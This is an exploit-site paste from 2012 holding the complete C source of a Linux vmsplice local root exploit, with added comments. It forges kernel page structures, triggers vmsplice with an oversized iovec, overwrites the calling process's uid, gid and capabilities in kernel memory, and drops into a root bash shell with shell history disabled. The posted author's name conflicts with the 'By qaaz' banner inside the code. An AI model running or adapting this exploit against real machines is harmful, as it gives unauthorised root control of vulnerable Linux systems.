moften

Linux Local Root Exploit

Mar 27th, 2012
  1. Author : Mr NoRvI
  2. Email:x_____@w.cn
  3. Phone Number:+21376773654
  4. Greetz: Inj3ct0r Exploit DataBase 1337day.com
  5. /*
  6. * Mr NoRvI.c
  7. *
  8. * Greetz To Arhack.net/vb.
  9. * Linux Local Root Exploit
  10. * By Mr NoRvI
  11. *
  12. * Linux 2.6.18 - 2011
  13. *
  14. * Good_LucK :D
  15. *
  16. * -static -Wno-format
  17. */
  18. #define _GNU_SOURCE
  19. #include
  20. #include
  21. #include
  22. #include
  23. #include
  24. #include
  25. #include
  26. #include
  27. #include
  28. #include
  29. #include
  30. #define __KERNEL__
  31. #include
  32.  
  33. #define PIPE_BUFFERS 16
  34. #define PG_compound 14
  35. #define uint unsigned int
  36. #define static_inline static inline __attribute__((always_inline))
  37. #define STACK(x) (x + sizeof(x) - 40)
  38.  
/*
 * Userland mirror of the kernel's struct page as this program assumes it is
 * laid out (flags, two counters, private, mapping, index, lru).  main() writes
 * forged pages through this layout into fixed-address mappings, so field order
 * and sizes must match the target kernel -- that is an assumption about the
 * target, not something checked at runtime.
 */
struct page {
	unsigned long flags;             /* first word; main() stores 1 << PG_compound here */
	int count;
	int mapcount;
	unsigned long private;           /* set to the page's own address in main() */
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru; /* lru.next is pointed at kernel_code() */
};
  48.  
/* Userland continuation entered by exit_kernel(); defined further down. */
void exit_code();
/* 1 MiB region used as the user stack for exit_code(); STACK() yields a
 * pointer 40 bytes below its end. */
char exit_stack[1024 * 1024];
  51.  
/*
 * Print a failure message on stdout and terminate the process with status 1.
 *
 * msg: short description of what failed.
 * err: errno value appended via strerror(); 0 prints msg alone.
 *
 * Never returns.
 */
void die(char *msg, int err)
{
	if (err) {
		printf("[-] %s: %s\n", msg, strerror(err));
	} else {
		printf("[-] %s\n", msg);
	}
	/* Flush both streams explicitly so nothing buffered is lost on exit. */
	fflush(stdout);
	fflush(stderr);
	exit(1);
}
  59.  
  60. #if defined (__i386__)
  61.  
  62. #ifndef __NR_vmsplice
  63. #define __NR_vmsplice 316
  64. #endif
  65.  
  66. #define USER_CS 0x73
  67. #define USER_SS 0x7b
  68. #define USER_FL 0x246
  69.  
/*
 * i386: leave kernel mode and resume in user mode at exit_code() running on
 * exit_stack.  Writes an iret frame (SS, ESP, EFLAGS, CS, EIP) in place on the
 * current stack and executes iret.  USER_CS/USER_SS/USER_FL are hard-coded
 * selector and flag values assumed for the target kernel's user segments.
 * Inline asm; statement order and offsets are load-bearing.
 */
static_inline
void exit_kernel()
{
	__asm__ __volatile__ (
	"movl %0, 0x10(%%esp) ;"   /* SS     */
	"movl %1, 0x0c(%%esp) ;"   /* ESP    */
	"movl %2, 0x08(%%esp) ;"   /* EFLAGS */
	"movl %3, 0x04(%%esp) ;"   /* CS     */
	"movl %4, 0x00(%%esp) ;"   /* EIP    */
	"iret"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}
  84.  
/*
 * i386: return the kernel's current task pointer.  Masks ESP down to an
 * 8 KiB boundary (~8191) and reads the first word stored there -- assumes the
 * target kernel keeps the task pointer at offset 0 of the block at the base
 * of an 8 KiB kernel stack (presumably thread_info->task); confirm for the
 * kernel being studied.
 */
static_inline
void * get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movl %%esp, %%eax ;"
	"andl %1, %%eax ;"        /* round down to the 8 KiB stack base */
	"movl (%%eax), %0"        /* first word at the base */
	: "=r" (curr)
	: "i" (~8191)
	);
	return (void *) curr;
}
  98.  
  99. #elif defined (__x86_64__)
  100.  
  101. #ifndef __NR_vmsplice
  102. #define __NR_vmsplice 278
  103. #endif
  104.  
  105. #define USER_CS 0x23
  106. #define USER_SS 0x2b
  107. #define USER_FL 0x246
  108.  
/*
 * x86_64: leave kernel mode and resume in user mode at exit_code() running on
 * exit_stack.  swapgs restores the user GS base (assumes the kernel entry
 * path swapped it), then an iretq frame (SS, RSP, RFLAGS, CS, RIP) is written
 * in place on the current stack and iretq executed.  USER_CS/USER_SS/USER_FL
 * are hard-coded values assumed for the target kernel.  Inline asm; order and
 * offsets are load-bearing.
 */
static_inline
void exit_kernel()
{
	__asm__ __volatile__ (
	"swapgs ;"
	"movq %0, 0x20(%%rsp) ;"   /* SS     */
	"movq %1, 0x18(%%rsp) ;"   /* RSP    */
	"movq %2, 0x10(%%rsp) ;"   /* RFLAGS */
	"movq %3, 0x08(%%rsp) ;"   /* CS     */
	"movq %4, 0x00(%%rsp) ;"   /* RIP    */
	"iretq"
	: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
	    "i" (USER_CS), "r" (exit_code)
	);
}
  124.  
/*
 * x86_64: return the kernel's current task pointer by reading the 8-byte
 * value at %gs:0 -- assumed to be the per-CPU current-task slot on the
 * target kernel; confirm for the kernel being studied.
 */
static_inline
void * get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	"movq %%gs:(0), %0"
	: "=r" (curr)
	);
	return (void *) curr;
}
  135.  
  136. #else
  137. #error "unsupported arch"
  138. #endif
  139.  
/*
 * Provide _vmsplice(): through the legacy _syscall4() macro when the kernel
 * headers still offer it, otherwise through libc's syscall() with the
 * per-architecture __NR_vmsplice chosen above.
 */
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
	long, _vmsplice,
	int, fd,
	struct iovec *, iov,
	unsigned long, nr_segs,
	unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
  152.  
/* Real uid/gid of the invoking user: captured in main() and matched against
 * the task structure by kernel_code(). */
static uint uid, gid;
  154.  
/*
 * Payload executed in kernel context once the kernel follows the forged
 * page's lru.next.  Scans the current task structure one word at a time for
 * four copies of uid followed by four copies of gid (the credential layout
 * this targets -- presumably uid/euid/suid/fsuid and the gid equivalents),
 * zeroes all eight, skips one pointer-sized slot and sets the next three
 * words to ~0 (presumably capability sets), then returns to user mode via
 * exit_kernel().  None of this is reachable on a kernel that validates the
 * iovec handed to vmsplice() in main().
 */
void kernel_code()
{
	int i;
	uint *p = get_current();

	/* Bounded scan: at most 1024-13 words from the task pointer. */
	for (i = 0; i < 1024-13; i++) {
		if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&
		    p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) {
			p[0] = p[1] = p[2] = p[3] = 0;
			p[4] = p[5] = p[6] = p[7] = 0;
			/* Step past the eight ids and one pointer before the ~0 writes. */
			p = (uint *) ((char *)(p + 8) + sizeof(void *));
			p[0] = p[1] = p[2] = ~0;
			break;
		}
		p++;
	}
	/* Reached whether or not the pattern was found. */
	exit_kernel();
}

/*
 * Userland continuation: entered from exit_kernel() and also installed as the
 * SIGPIPE handler in main().  Confirms the credential rewrite took hold (dies
 * with "wtf" otherwise), then replaces the process with an interactive shell
 * whose history file is pointed at /dev/null.  Declared without the int
 * parameter a signal handler receives.
 */
void exit_code()
{
	if (getuid() != 0)
		die("wtf", 0);

	printf("[+] root\n");
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", NULL);
	/* Only reached if execl() fails. */
	die("/bin/bash", errno);
}

/*
 * Entry point.  Lays out the forged pages and the buffer vmsplice() will
 * walk, then triggers the kernel path.  Stages:
 *   1. capture the caller's uid/gid and refuse to run as root;
 *   2. map three fixed-address pages holding forged struct page data whose
 *      lru.next points at kernel_code();
 *   3. map a (PIPE_BUFFERS * 3 + 2)-page buffer, shrink it by two pages and
 *      unmap the page directly after it;
 *   4. create a pipe, close its read end so a write raises SIGPIPE, and hand
 *      vmsplice() an iovec of length ULONG_MAX.
 * argc/argv are unused.  Pointers are printed with %lx throughout, which is
 * why the header asks for -Wno-format.
 */
int main(int argc, char *argv[])
{
	int pi[2];
	size_t map_size;
	char * map_addr;
	struct iovec iov;
	struct page * pages[5];

	uid = getuid();
	gid = getgid();
	setresuid(uid, uid, uid);
	setresgid(gid, gid, gid);

	printf("-----------------------------------\n");
	printf(" Linux vmsplice Local Root Exploit\n");
	printf(" By qaaz\n");
	printf("-----------------------------------\n");

	/* Stage 1: refuses to run when already root. */
	if (!uid || !gid)
		die("!@#$", 0);

	/* Stage 2a: first fixed page.  The address is produced by reading an
	 * int[2] {0, PAGE_SIZE} through a void* -- width- and endianness-
	 * dependent: 0 on 32-bit, PAGE_SIZE << 32 on little-endian 64-bit. */
	pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
	pages[1] = pages[0] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[0]);
	printf("[+] page: 0x%lx\n", pages[1]);

	pages[0]->flags = 1 << PG_compound;
	pages[0]->private = (unsigned long) pages[0];
	pages[0]->count = 1;
	pages[1]->lru.next = (long) kernel_code;

	/* Stage 2b: the next fixed address is the first word of pages[0], i.e.
	 * its flags value (1 << PG_compound) reinterpreted as a pointer. */
	pages[2] = *(void **) pages[0];
	pages[3] = pages[2] + 1;

	map_size = PAGE_SIZE;
	map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[2]);
	printf("[+] page: 0x%lx\n", pages[3]);

	pages[2]->flags = 1 << PG_compound;
	pages[2]->private = (unsigned long) pages[2];
	pages[2]->count = 1;
	pages[3]->lru.next = (long) kernel_code;

	/* Stage 2c: third fixed page at PAGE_SIZE (same int[2] trick; the first
	 * element is the low word on both widths here). Left zeroed. */
	pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
	map_size = PAGE_SIZE;
	map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
	                MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);
	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
	printf("[+] page: 0x%lx\n", pages[4]);

	/* Stage 3: the buffer vmsplice() is pointed at. */
	map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
	map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
	                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (map_addr == MAP_FAILED)
		die("mmap", errno);

	memset(map_addr, 0, map_size);
	printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

	/* Shrink the buffer by two pages and unmap the page that now lies
	 * directly after it, leaving a hole. */
	map_size -= 2 * PAGE_SIZE;
	if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
		die("munmap", errno);

	/* Stage 4: the read end is closed so the pipe write path raises SIGPIPE,
	 * which exit_code() is installed to handle. */
	if (pipe(pi) < 0)
		die("pipe", errno);
	close(pi[0]);

	iov.iov_base = map_addr;
	iov.iov_len = ULONG_MAX;   /* deliberately oversized; presumably unchecked on affected kernels */

	signal(SIGPIPE, exit_code);
	_vmsplice(pi[1], &iov, 1, 0);
	/* On a kernel that rejects the iovec, vmsplice() returns and this reports it. */
	die("vmsplice", errno);
	return 0;   /* unreachable: die() never returns */
}
  221.  
  222.  
  223. # 1337day.com [2012-03-27]